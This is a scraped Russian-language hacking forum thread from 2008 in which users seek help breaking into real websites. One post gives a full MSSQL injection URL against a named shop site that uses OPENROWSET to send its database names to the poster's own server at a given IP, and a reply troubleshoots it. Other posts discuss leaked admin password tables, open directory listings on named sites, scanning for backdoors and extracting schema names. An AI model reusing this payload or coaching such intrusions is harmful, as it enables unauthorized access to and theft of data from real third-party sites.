 |
|

02.04.2008, 18:02
|
|
Познающий
Регистрация: 26.01.2008
Сообщений: 71
С нами:
9626078
Репутация:
141
|
|
ну собственно не как  купи проше деда да втыкай что душе угодно 
|
|
|

02.04.2008, 19:12
|
|
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
С нами:
10009826
Репутация:
435
|
|
вот интересно, нашел сайт, есть таблица админы, ну и там одмины естт и пароли, но на сайте нет ни форума ни админки (сканил) на фтп не подходят, вопрос Зачем они нафиг нужны?
|
|
|

02.04.2008, 19:16
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
С нами:
10393869
Репутация:
2032
|
|
Сообщение от Sharingan
вот интересно, нашел сайт, есть таблица админы, ну и там одмины естт и пароли, но на сайте нет ни форума ни админки (сканил) на фтп не подходят, вопрос Зачем они нафиг нужны?
может осталась от чего-то. или просто бд тестили. или фейк. или для другого домена. есть много вариантов
|
|
|
mssql-inject: приём данных на мой сервер |

02.04.2008, 20:31
|
|
Новичок
Регистрация: 29.03.2008
Сообщений: 7
С нами:
9536011
Репутация:
0
|
|
mssql-inject: приём данных на мой сервер
Пробую сделать передачу данных через инжект на свой mssql-сервер. Но возникла проблема с моим принимающим сервером.
Купил windows-хостинг с выделенным ипом. Создал базу данных MSSQL 2005 с именем basename. Пользователь username с паролем password. Создал таблицу tbltest с колонкой pubs.
Посылаю запрос: http://www.top25cigar.com/reviewdatabase/product.asp?pkID=8797&showprod=yes&catpkID=315;ins ert+into+openrowset('sqloledb','uid=username;pwd=p assword;network=DBMSSOCN;Address=208.115.103.4','s elect+line+from+pubs..tbltest')+select+name+from+m aster..sysdatabases;--
В ответ получаю Cannot open user default database. Login failed. Хотя по умолчанию база данных установлена. Мне кажется, что ошибка где-то в правах доступа.
Что мне исправить? Ниже приложу несколько скриншотов из MSSQL Server Management Studio Express.

Последний раз редактировалось cyberia; 02.04.2008 в 20:33..
|
|
|

02.04.2008, 22:37
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
cyberia
1 акк корректен
2 твоя таблица создана и идентична по структуре
3 запрос без грамматических ошибок
4 есть права на чтение master..sysdatabases
Эти условия выполнены?
Помоеиу невыполнение ЛЮБОГО из условий не даст тебе ничего сделать.
Да , забыл, порт на котором твой сервер висит.
Имхо слишком много заморочек, но дело твоё конечно, проверь ВСЕ условия
|
|
|

03.04.2008, 17:50
|
|
Новичок
Регистрация: 30.03.2008
Сообщений: 5
С нами:
9534127
Репутация:
0
|
|
Подскажите, что можно зделать есть маленький доступ
http://fialki.ho.com.ua/products_pictures/
вот от создателей
http://www.shop-script.ru/images/
или это не чего не дает
|
|
|

03.04.2008, 17:54
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 89
С нами:
10143707
Репутация:
114
|
|
2Hell0
Это дает только просмотр файлов и каталогов в данных директориях
|
|
|

03.04.2008, 21:27
|
|
Познающий
Регистрация: 21.03.2008
Сообщений: 39
С нами:
9547025
Репутация:
21
|
|
Здравствуйте, разесните мне пожалуйста один момент, при сканировании портов утилитой Shadow Security Scanner 7, она показывает что на сервере открыто огромное количество портов, среди них очень много бекдоров, нахожу клиен к бекдору, но не один не коннектится, пробовал на разных сайтах, где открыты эти порты, ни чего не получилось.
XSpyder'ом пробывал сканить, тот вообще не работает, ни трафу не жрет, ни порты не сканирует, только нагрузку на проц создает. Помогите пожалуйста дельным советом.
|
|
|

03.04.2008, 23:07
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Spaise
В чём вопрос то?
XSpyder не работает? Или открытые порты смущают?Огромное кол-во это сколько, и главное какие?С чего ты взял ,что "среди них очень много бекдоров", что за клиент к бекдору? 
|
|
|

04.04.2008, 01:28
|
|
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
С нами:
10009826
Репутация:
435
|
|
товарисчи напомните как вывести имя бд, для опр. таблицы, schema_name помню, а откуд забыл
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|